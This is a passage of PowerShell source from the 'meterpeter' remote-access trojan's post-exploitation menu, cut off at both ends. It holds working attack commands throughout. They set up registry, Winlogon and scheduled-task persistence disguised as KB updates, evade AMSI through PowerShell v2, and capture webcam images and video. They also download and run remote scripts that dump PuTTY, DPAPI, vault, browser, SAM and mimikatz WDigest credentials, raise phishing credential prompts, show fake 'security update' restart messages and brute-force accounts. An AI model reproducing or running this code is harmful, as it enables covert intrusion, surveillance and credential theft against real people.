'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' /v KBUpdate /d %tmp%\\KBPersist.vbs /t REG_EXPAND_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R PoWeRsHeLl -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs;remove-Item test.log -Force}}else{cmd /R reg add 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' /v KBUpdate /d %tmp%\\KBPersist.vbs /t REG_EXPAND_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R PoWeRsHeLl -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs}\";\r\n        }\r\n        If($startup_choise -ieq \"Schtasks\" -or $startup_choise -ieq \"tasks\")\r\n        {\r\n          $onjuyhg = ([char[]]([char]'A'..[char]'Z') + 0..9 | sort {get-random})[0..7] -join '';\r\n          write-host \" * Make Client Beacon Home Every xx Minuts.\" -ForegroundColor Green;Start-Sleep -Seconds 1;\r\n          write-Host \" - Input Client Remote Path: \" -ForeGroundColor Red -NoNewline;\r\n          $execapi = Read-Host;\r\n          write-Host \" - Input Beacon Interval (minuts): \" -ForeGroundColor Red -NoNewline;\r\n          $Interval = Read-Host;write-host \"`n\";\r\n          Write-Host \"   TaskName   Client Remote Path\" -ForeGroundColor green;\r\n          Write-Host \"   --------   ------------------\";\r\n          Write-Host \"   $onjuyhg   $execapi\";\r\n          write-host \"`n\";\r\n          If(-not($Interval)){$Interval = \"10\"}\r\n          If(-not($execapi)){$execapi = \"$env:tmp\\Update-KB5005101.ps1\"}\r\n          $myVer = \"PoWe\" + \"RsHeLl -ve\" + \"rsion 2\" -join ''\r\n          $MyTask = \"scht\" + \"asks /cr\" + \"eate\" -join ''\r\n          ## Settings: ($stime == time-interval) | (/st 00:00 /du 0003:00 == 3 hours duration)\r\n          $Command = \"`$bool = 
(([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 `> test.log;If(Get-Content test.log|Select-String `\"Enabled`\"){cmd /R $MyTask /sc minute /mo $Interval /tn `\"$onjuyhg`\" /tr `\"$myVer -windowstyle hidden -File `\"$execapi`\" /RU System`\";schtasks /Query /tn `\"$onjuyhg`\" `> schedule.txt;Get-content schedule.txt;Remove-Item schedule.txt -Force}else{cmd /R $MyTask /sc minute /mo $Interval /tn `\"$onjuyhg`\" /tr `\"powershell -windowstyle hidden -File `\"$execapi`\" /RU System`\";schtasks /Query /tn `\"$onjuyhg`\" `> schedule.txt;Get-content schedule.txt;Remove-Item schedule.txt -Force}}else{cmd /R $MyTask /sc minute /mo $Interval /tn `\"$onjuyhg`\" /tr `\"powershell -windowstyle hidden -File `\"$execapi`\" /RU System`\";schtasks /Query /tn `\"$onjuyhg`\" `> schedule.txt;Get-content schedule.txt;Remove-Item schedule.txt -Force}\";\r\n        }    \r\n        If($startup_choise -ieq \"WinLogon\" -or $startup_choise -ieq \"logon\")\r\n        {\r\n          ## If Available use powers`hell -ver`sion 2 {AM`SI Logging Evasion}\r\n          write-host \" * Execute Client ($payload_name.ps1) On Every StartUp.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n          Write-Host \"   Persist                Trigger Remote Path\" -ForeGroundColor green;\r\n          Write-Host \"   -------                -------------------\";\r\n          Write-Host \"   Update-KB5005101.ps1   `$env:tmp\\KBPersist.vbs\";\r\n          Write-Host \"   HIVEKEY: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v Userinit`n\";\r\n          $myVer = \"PoWe\" + \"RsHeLl -ve\" + \"rsion 2\" -join ''\r\n          $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 `> 
test.log;If(Get-Content test.log|Select-String `\"Enabled`\"){cmd /R reg add 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' /v Userinit /d %windir%\\system32\\userinit.exe,%tmp%\\KBPersist.vbs /t REG_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R $myVer -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs;remove-Item test.log -Force}else{cmd /R reg add 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' /v Userinit /d %windir%\\system32\\userinit.exe,%tmp%\\KBPersist.vbs /t REG_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R PoWeRsHeLl -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs;remove-Item test.log -Force}}else{echo `\"   Client Admin Privileges Required (run as administrator)`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n        }\r\n        If($startup_choise -ieq \"Return\" -or $startup_choise -ieq \"return\" -or $logs_choise -ieq \"cls\" -or $logs_choise -ieq \"Modules\" -or $logs_choise -ieq \"modules\" -or $logs_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $startup_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"Camera\" -or $choise -ieq \"cam\")\r\n      {\r\n        write-host \"`n`n   Remark:\" -ForegroundColor Yellow;\r\n        write-host \"   This module allow users to enumerate webcams available,\"\r\n        write-host \"   take webcam screenshot(s) or capture webcam live stream.\"\r\n        write-host \"   Remark: snapshots are stored in remote %TMP% directory.\" -ForegroundColor DarkYellow\r\n        write-host \"   Remark: webcam turns 'ON' the ligth while recording.\" -ForegroundColor DarkYellow\r\n        write-host \"`n`n   Modules    Description                 
Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------    -----------                 -------------------\";\r\n        write-host \"   Device     List all camera devices     UserLand\";\r\n        write-host \"   SnapShot   Capture webcam screenshot   UserLand\";\r\n        write-host \"   WebCamAvi  Webcam live stream [.avi]   \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red\r\n        write-host \"   Return     Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Post:Cam> \" -NoNewline -ForeGroundColor Green;\r\n        $Cam_choise = Read-Host;\r\n        If($Cam_choise -ieq \"Device\")\r\n        {\r\n           write-host \" * Listing Available WebCams`n\" -ForeGroundColor Green;\r\n           $Command = \"Get-PnpDevice -FriendlyName *webcam* -Class Camera,image|Select Status,Class,FriendlyName,InstanceId|Format-Table -AutoSize|Select -SkipLast 1|Out-File `$Env:TMP\\device.log -Force;Get-Content -Path `\"`$Env:TMP\\device.log`\";Remove-Item -Path `\"`$Env:TMP\\device.log`\"`-Force\";\r\n        }\r\n        If($Cam_choise -ieq \"SnapShot\")\r\n        {\r\n           write-host \" * Capture one webcam snapshot.\" -ForeGroundColor Green\r\n           write-host \"`n   State      Snapshot\" -ForeGroundColor Green;\r\n           write-host \"   -----      --------\"\r\n           Write-Host \"   starting   \" -ForegroundColor Red -NoNewline\r\n           Write-Host \"image.bmp`n\"\r\n\r\n           $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/CommandCam.exe`\" -OutFile `\"`$Env:TMP\\commandcam.exe`\";Start-Process -WindowStyle hidden powershell -argumentlist `\"cmd /R start /min %tmp%\\CommandCam.exe`\" -Wait;echo `\"  Storage : `$Env:TMP\\image.bmp`\";Remove-Item `$Env:TMP\\CommandCam.exe -Force\";\r\n        }\r\n        If($Cam_choise -ieq \"WebCamAvi\")\r\n        {\r\n           write-host \" * Live stream using default 
webcam.\" -ForeGroundColor Green\r\n\r\n           write-host \" - Time to record vid in seconds: \" -ForeGroundColor Red -NoNewline;\r\n           [int]$RecTime = Read-Host\r\n           If([int]$RecTime -lt 10 -or [int]$RecTime -gt 120)\r\n           {\r\n              [int]$RecTime = \"10\"\r\n              write-host \"   => Error: wrong input, default to $RecTime (sec)\" -ForeGroundColor red      \r\n           }\r\n\r\n           write-host \" - Silent install dependencies missing? (y|n): \" -ForegroundColor Red -NoNewline\r\n           $DependOff = Read-Host\r\n\r\n           $CurrentDate = (Get-Date -Format 'HH:mm')\r\n           write-host \" - Schedule webcam record time? ($CurrentDate|now)  : \" -NoNewline\r\n           $StartTime = Read-Host\r\n           If([string]::IsNullOrEmpty($StartTime))\r\n           {\r\n              $StartTime = \"now\"\r\n              write-host \"   => Error: wrong input, default to [\" -ForeGroundColor red -NoNewline\r\n              write-host \"$StartTime\" -ForegroundColor DarkGreen -NoNewline   \r\n              write-host \"]\" -ForeGroundColor red  \r\n           }\r\n           ElseIf($StartTime -iMatch '^(now)$')\r\n           {\r\n              write-host \"   - \" -ForeGroundColor Green -NoNewline\r\n              write-host \"Start webcam recording [\" -NoNewline\r\n              write-host \"$StartTime\" -ForegroundColor DarkGreen -NoNewline\r\n              write-host \"]\"\r\n           }\r\n           ElseIf($StartTime -NotMatch '^(\\d+\\d+:+\\d+\\d)$')\r\n           {\r\n              ## Generate time with 2 minuts ahead\r\n              $HourInput = (Get-Date -Format 'HH')\r\n              $MinuInput = (Get-Date -Format 'mm')\r\n\r\n              If($MinuInput.Length -lt 2)\r\n              {\r\n                 ## Add '0' to string if $MinuInput\r\n                 # have deleted the '0' from string\r\n                 $newvalues = [int]$MinuInput+2\r\n                 $AddExtram = \"0\" + \"$newvalues\" 
-join ''              \r\n              }\r\n              Else\r\n              {\r\n                 $AddExtram = [int]$MinuInput+2\r\n              }\r\n\r\n              write-host \"   => Error: [$StartTime] input, default to [\" -ForeGroundColor red -NoNewline\r\n              $StartTime = \"$HourInput\" + \":\" + \"$AddExtram\" -join ''\r\n              write-host \"$StartTime\" -ForegroundColor DarkGreen -NoNewline   \r\n              write-host \"] hours\" -ForeGroundColor red                                      \r\n           }\r\n           Else\r\n           {\r\n              write-host \"   - \" -ForeGroundColor Green -NoNewline\r\n              write-host \"Start webcam recording [\" -NoNewline\r\n              write-host \"$StartTime\" -ForegroundColor DarkGreen -NoNewline\r\n              write-host \"] hours\"           \r\n           }\r\n\r\n           ## Print Settings OnScreen\r\n           write-host \"`n`n  State      VideoFile       RecordTime\" -ForegroundColor Green\r\n           write-host \"  -----      ---------       ----------\"\r\n           write-host \"  running    \" -ForegroundColor Red -NoNewline\r\n           write-host \"meterpeter.avi  ${RecTime} (secs)   \"\r\n\r\n           If(-not($DependOff) -or $DependOff -iMatch '^(n|no)$')\r\n           {\r\n              #Execute command remote\r\n              $Command = \"`$CheckInstall = [bool](python -V);If(`$CheckInstall -Match 'True'){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WebCam-Capture/Invoke-webcamAvi.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-webcamAvi.ps1`\";Start-Process -WindowStyle hidden powershell -argumentList `\"-file `$Env:TMP\\Invoke-webcamAvi.ps1 -rectime $RecTime -starttime $StartTime -autodel`\";echo `\"`n  State   : recording webcam live in avi format.`\";echo `\"  Remark  : module takes a few seconds before start capture.`\";echo `\"  Storage : `$Env:TMP\\meterpeter.avi`\"}Else{echo `\"`n  `> Error: module requires 'Python3' 
installed on target system.`\"}\"\r\n           }\r\n           Else\r\n           {\r\n              #Execute command remote [silent install dependencies]\r\n              $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WebCam-Capture/Invoke-webcamAvi.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-webcamAvi.ps1`\";Start-Process -WindowStyle hidden powershell -argumentList `\"-file `$Env:TMP\\Invoke-webcamAvi.ps1 -rectime $RecTime -starttime $StartTime -forceinstall -autodel`\";echo `\"`n  State   : recording webcam live in avi format.`\";echo `\"  State   : Silent install python3 dependencies if missing.`\";echo `\"  Remark  : module takes a few seconds before start capture.`\";echo `\"  Storage : `$Env:TMP\\meterpeter.avi`\"\"\r\n           }\r\n        }\r\n        If($Cam_choise -ieq \"Return\" -or $Cam_choise -ieq \"cls\" -or $Cam_choise -ieq \"Modules\" -or $Cam_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $Cam_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"Restart\")\r\n      {\r\n        ## Fast restart of Remote-Host (with msgbox)\r\n        Write-Host \" - RestartTime: \" -ForeGroundColor Red -NoNewline;\r\n        $shutdown_time = Read-Host;\r\n\r\n        If(-not ($shutdown_time) -or $shutdown_time -eq \" \")\r\n        {\r\n          ## Default restart { - RestartTime: blank }\r\n          Write-Host \"`n`n   Status   Schedule   Message\" -ForeGroundColor green;\r\n          Write-Host \"   ------   --------   -------\";\r\n          Write-Host \"   restart  60 (sec)   A restart is required to finish install security updates.\";\r\n\r\n          write-Host \"`n`n - Continue? 
(y|n): \" -NoNewline\r\n          $Continue = Read-Host\r\n          If($Continue -iMatch '^(y|yes)$')\r\n          {\r\n             $Command = \"cmd /R shutdown /r /c `\"A restart is required to finish install security updates.`\" /t 60\"          \r\n          }\r\n          Else\r\n          {\r\n             $Command = $null          \r\n          }\r\n\r\n        }\r\n        Else\r\n        {\r\n          write-host \" - RestartMessage: \" -NoNewline;\r\n          $shutdown_msg = Read-Host;\r\n          If (-not ($shutdown_msg) -or $shutdown_msg -eq \" \")\r\n          {\r\n            ## Default msgbox { - RestartMessage: blank }\r\n            Write-Host \"`n`n   Status   Schedule   Message\" -ForeGroundColor green;\r\n            Write-Host \"   ------   --------   -------\";\r\n            Write-Host \"   restart  $shutdown_time (sec)   A restart is required to finish install security updates.\";\r\n\r\n            write-Host \"`n`n - Continue? (y|n): \" -NoNewline\r\n            $Continue = Read-Host\r\n            If($Continue -iMatch '^(y|yes)$')\r\n            {\r\n               $Command = \"cmd /R shutdown /r /c `\"A restart is required to finish install security updates.`\" /t $shutdown_time\";          \r\n            }\r\n            Else\r\n            {\r\n               $Command = $null          \r\n            }\r\n          }\r\n          Else\r\n          {\r\n            ## User Inputs { - RestartTime: ++ - RestartMessage: }\r\n            Write-Host \"`n`n   Status   Schedule   Message\" -ForeGroundColor green;\r\n            Write-Host \"   ------   --------   -------\";\r\n            Write-Host \"   restart  $shutdown_time (sec)   $shutdown_msg\"\r\n\r\n            write-Host \"`n`n - Continue? 
(y|n): \" -NoNewline\r\n            $Continue = Read-Host\r\n            If($Continue -iMatch '^(y|yes)$')\r\n            {\r\n               $Command = \"cmd /R shutdown /r /c `\"$shutdown_msg`\" /t $shutdown_time\"          \r\n            }\r\n            Else\r\n            {\r\n               $Command = $null          \r\n            }\r\n          }\r\n        }\r\n\r\n        write-host \"\"\r\n        $shutdown_msg = $Null;\r\n        $shutdown_time = $Null;\r\n      }\r\n      If($choise -ieq \"Passwords\" -or $choise -ieq \"pass\")\r\n      {\r\n        $fdx = \"cr@ede@nti@al du@mp\" -replace '@',''\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   Start module searchs for credential strings inside\"\r\n        write-host \"   all files starting in the input directory recursive.\"\r\n        write-host \"   Dpapi and Vault modules dumps PasswordVault credentials.\" -ForegroundColor Yellow\r\n        write-host \"   WDigest invokes m[i]mika[t]z to dump creds from memory\" -ForegroundColor Yellow\r\n        write-host \"`n`n   Modules   Description                    Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                    ------------------\";\r\n        write-host \"   File      Search for creds inside files  UserLand\";\r\n        write-host \"   Putty     Leak PUTTY session(s) creds    UserLand\";\r\n        write-host \"   Dpapi     Dump DPAPI masterKeys + blobs  UserLand\";\r\n        write-host \"   Vault     Dump creds from PasswordVault  UserLand\";\r\n        write-host \"   WDigest   Credential caching [memory]    \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red\r\n        write-host \"   Browser   Clear-text $fdx     \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red\r\n        write-host \"   DumpSAM   Dump hashs from registry hives \" -NoNewline\r\n        write-host \"Administrator\" 
-ForegroundColor Red\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Post:Pass> \" -NoNewline -ForeGroundColor Green;\r\n        $pass_choise = Read-Host;\r\n        If($pass_choise -ieq \"Putty\")\r\n        {\r\n           write-host \" * Dumping PUTTY session(s) creds.`n\" -ForegroundColor Green\r\n           $Command = \"iwr -uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Invoke-PuttyCreds.ps1 -OutFile `$Env:TMP\\Invoke-PuttyCreds.ps1;powershell -File `$Env:TMP\\Invoke-PuttyCreds.ps1 -autodel;Remove-Item -Path `$Env:TMP\\Invoke-PuttyCreds.ps1 -Force\"\r\n        }\r\n        If($pass_choise -ieq \"DumpSAM\" -or $pass_choise -ieq \"sam\")\r\n        {\r\n           write-host \" * Dump credentials from registry hives.\" -ForegroundColor Green;write-host \"\";\r\n           $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){cd `$Env:TMP;iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Sam/Invoke-Dump.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Dump.ps1`\"|Unblock-File;Import-Module -Name `\".\\Invoke-Dump.ps1`\" -Force;Invoke-Dump;Remove-Item -Path `\"`$Env:TMP\\Invoke-Dump.ps1`\" -Force}Else{echo `\"   `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n        }\r\n        If($pass_choise -ieq \"WDigest\")\r\n        {\r\n           write-host \" * WDigest Credential caching [memory]`n\" -ForegroundColor Green\r\n\r\n           write-host \"   Description:\" -ForegroundColor DarkYellow\r\n           write-host \"   This module patches WDigest [memory] so that m[i]mika[t]z\"\r\n           write-host \"   can retrieve any clear-text credentials present in memory.`n\"\r\n\r\n           write-host \"   Prompt target user for 
credential: 'yes' pauses module\"\r\n           write-host \"   execution while waiting for target user credential input,\"\r\n           write-host \"   only then it resumes execution and print results onscreen`n\"\r\n\r\n           write-host \" - Prompt target user for credential? (yes|no): \" -ForegroundColor Red -NoNewLine\r\n           $PromptBox = Read-Host\r\n\r\n           write-host \"   => module takes aprox 2 minuts to finish is work.\" -ForegroundColor Yellow\r\n           If(-not($PromptBox) -or ($PromptBox -iMatch '^(no|n)$'))\r\n           {\r\n              $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/DeviceGuard/Invoke-WDigest.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WDigest.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -banner 'false' -wdigest 'true' -manycats;Remove-Item -Path `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -Force\";\r\n           }\r\n           Else\r\n           {\r\n              $MyRunes = \"-r\" + \"una\" + \"s\" -join ''\r\n              $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/DeviceGuard/Invoke-WDigest.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WDigest.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -banner 'false' -wdigest 'true' -manycats $MyRunes;Remove-Item -Path `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -Force\";\r\n           }\r\n        }\r\n        If($pass_choise -ieq \"Browser\")\r\n        {\r\n           write-host \" * WebBrowser cred`ential dump.\" -ForegroundColor Green\r\n           $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/DeviceGuard/Invoke-WDigest.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WDigest.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -banner 'false' -wdigest 'false' -browsercreds;Remove-Item -Path `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -Force\";\r\n        }\r\n        If($pass_choise -ieq \"Dpapi\")\r\n        
{\r\n           write-host \" * Dump \" -ForegroundColor Green -NoNewline\r\n           write-host \"$Remote_Host\" -ForegroundColor Red -NoNewline\r\n           write-host \" DPAPI secrets.\" -ForegroundColor Green\r\n           $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Invoke-VaultCmd.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\" -action `\"DPAPI`\" -banner `\"false`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\" -Force\";\r\n        }\r\n        If($pass_choise -ieq \"Vault\")\r\n        {\r\n           write-host \" * Dumping PasswordVault credentials.\" -ForegroundColor Green\r\n           $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Invoke-VaultCmd.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\" -action `\"dump`\" -banner `\"false`\" -secure;Remove-Item -Path `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\" -Force\"\r\n        }\r\n        If($pass_choise -ieq \"File\")\r\n        {\r\n          write-host \" * Search for stored credentials inside files.\" -ForegroundColor Green\r\n          write-host \"   Leave input fields black to use default settings.\" -ForegroundColor DarkYellow\r\n\r\n          write-host \" - Directory to search recursive (`$Env:USERPROFILE): \" -ForeGroundColor Red -NoNewLine\r\n          $Recursive_search = Read-Host\r\n\r\n          If(-not($Recursive_search))\r\n          {\r\n             $Recursive_search = \"`$Env:USERPROFILE\"\r\n             write-host \"   => Error: wrong input, default to $Recursive_search\" -ForegroundColor Red\r\n          }\r\n\r\n          write-host \" - String or Regex command to search (password=)   : \" -NoNewLine\r\n          $String = Read-Host\r\n          If(-not($String))\r\n          {\r\n             write-host \"   => Error: wrong 
input, using cmdlet default Regex\" -ForegroundColor Red\r\n             $String = \"(^(\\s+U|U)ser.{0,6}(=|:).[^$]{0,22}$)|(^(\\s+p|\\s+cp|cp|p)ass.{0,6}(=|:).{0,22}$)|(^(\\s+p|p)wd.{0,2}(=|:).{0,22}$)|(log(i|o)n.{0,2}(=|:).[^$]{0,22}$)\"\r\n          }\r\n\r\n          write-host \" - Stop searching after found xxx results (100)    : \" -NoNewLine\r\n          $StopAt = Read-Host\r\n          If(-not($StopAt))\r\n          {\r\n             $StopAt = \"15\"\r\n             write-host \"   => Error: wrong input, default to 15 max results.\" -ForegroundColor Red\r\n          }\r\n\r\n          write-host \" - Display detailed (verbose) scan reports? (y|n)  : \" -NoNewLine\r\n          $VerboseMode = Read-Host\r\n          write-host \"   => Please wait until module finishes working.\" -ForegroundColor DarkYellow\r\n\r\n          If(-not($VerboseMode))\r\n          {\r\n             $VerboseMode = \"false\"\r\n             write-host \"   => Error: wrong input, default verbose to false..\" -ForegroundColor Red\r\n          }\r\n          ElseIf(($VerboseMode -iMatch '^(n|no)$'))\r\n          {\r\n             $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Find-Strings.ps1`\" -OutFile `\"`$Env:TMP\\Find-Strings.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Find-Strings.ps1`\" -Path `\"$Recursive_search`\" -String `\"$String`\" -StopAt `\"$StopAt`\";Remove-Item -Path `\"`$Env:TMP\\Find-Strings.ps1`\" -Force\";\r\n          }\r\n          Else\r\n          {\r\n             $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Find-Strings.ps1`\" -OutFile `\"`$Env:TMP\\Find-Strings.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Find-Strings.ps1`\" -Path `\"$Recursive_search`\" -String `\"$String`\" -StopAt `\"$StopAt`\" -verb -limmit `\"1`\";Remove-Item -Path `\"`$Env:TMP\\Find-Strings.ps1`\" -Force\";\r\n          }\r\n        }\r\n        If($pass_choise -ieq \"Return\" -or 
$pass_choise -ieq \"cls\" -or $pass_choise -ieq \"Modules\" -or $pass_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $pass_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"LockPC\" -or $choise -ieq \"lock\")\r\n      {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   This module allow users to lock target pc\"\r\n        write-host \"   Remark: This function silent restarts explorer.\" -ForeGroundColor yellow;\r\n        write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                     ------------------\";\r\n        write-host \"   start     lock target pc                  UserLand\";\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Post:Lock> \" -NoNewline -ForeGroundColor Green;\r\n        $Lock_choise = Read-Host;\r\n        If($Lock_choise -ieq \"start\")\r\n        {\r\n           $Ob = \"rund\" + \"ll32.exe user32\" + \".dll, LockWor\" + \"kStation\" -join ''\r\n           write-host \" * Lock Remote WorkStation.\" -ForegroundColor Green;write-host \"`n`n\";\r\n           $Command = \"$Ob;echo `\"   [i] Remote-Host WorkStation Locked ..`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n        }\r\n        If($Lock_choise -ieq \"Return\" -or $Lock_choise -ieq \"cls\" -or $Lock_choise -ieq \"Modules\" -or $Lock_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $Lock_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"PhishCred\" -or $choise -ieq \"Creds\")\r\n      {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   This module spawns a remote 'Prompt-For-Credential' dialogBox\";\r\n        
write-host \"   in the hope that target user enters is credentials to leak them\";\r\n        write-host \"`n`n   Modules     Description                 Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------     -----------                 ------------------\";\r\n        write-host \"   Start       Phish for remote creds      UserLand\";\r\n        write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Post:Creds> \" -NoNewline -ForeGroundColor Green;\r\n        $cred_choise = Read-Host;\r\n        If($cred_choise -ieq \"Start\")\r\n        {\r\n           write-host \" * Phish`ing for remote credentials (logon)\" -ForegroundColor Green;Write-Host \"\"\r\n           $Command = \"cd `$Env:TMP;`$GetEnvironement = [System.Environment]::OSVersion.Version.Major;If(-not(`$GetEnvironement -match '^(10|11)$')){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/CredsPhish.ps1`\" -OutFile `\"`$Env:TMP\\CredsPhish.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-File `$Env:TMP\\CredsPhish.ps1 -PhishCreds start`\" -Wait;Get-Content -Path `\"`$Env:TMP\\creds.log`\";Remove-Item -Path `\"`$Env:TMP\\creds.log`\" -Force;Remove-Item -Path `\"`$Env:TMP\\CredsPhish.ps1`\" -Force}Else{iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/PhishCreds.ps1`\" -OutFile `\"`$Env:TMP\\PhishCreds.ps1`\"|Unblock-File;powershell -file PhishCreds.ps1;Remove-Item PhishCreds.ps1 -force}\"\r\n        }\r\n        If($cred_choise -ieq \"Return\" -or $cred_choise -ieq \"return\" -or $cred_choise -ieq \"cls\" -or $cred_choise -ieq \"Modules\" -or $cred_choise -ieq \"modules\" -or $cred_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n        }\r\n        $cred_choise = $Null;\r\n      }\r\n      If($choise -ieq \"BruteAcc\")\r\n      {\r\n         
write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   Bruteforcing user account password using dicionary attack.\"\r\n         write-host \"   Remark: Default dicionary contains 59189 credential entrys.\" -ForegroundColor Yellow\r\n         write-host \"   Remark: If you wish to use your own dicionary, then store\" -ForegroundColor Yellow\r\n         write-host \"   it on target %TMP% directory under the name of passw.txt\" -ForegroundColor Yellow\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  ------------------\";\r\n         write-host \"   Start    Bruteforcing user account    UserLand\";\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Post:BruteAcc> \" -NoNewline -ForeGroundColor Green;\r\n         $Brute_choise = Read-Host;\r\n         If($Brute_choise -ieq \"Start\")\r\n         {\r\n            Write-Host \" - Input Account Name:\" -ForeGroundColor Red -NoNewline\r\n            $UserAccountName = Read-Host\r\n            Write-Host \" * Bruteforcing user account.\" -ForegroundColor Green\r\n            If(-not($UserAccountName) -or $UserAccountName -eq $null){$UserAccountName = 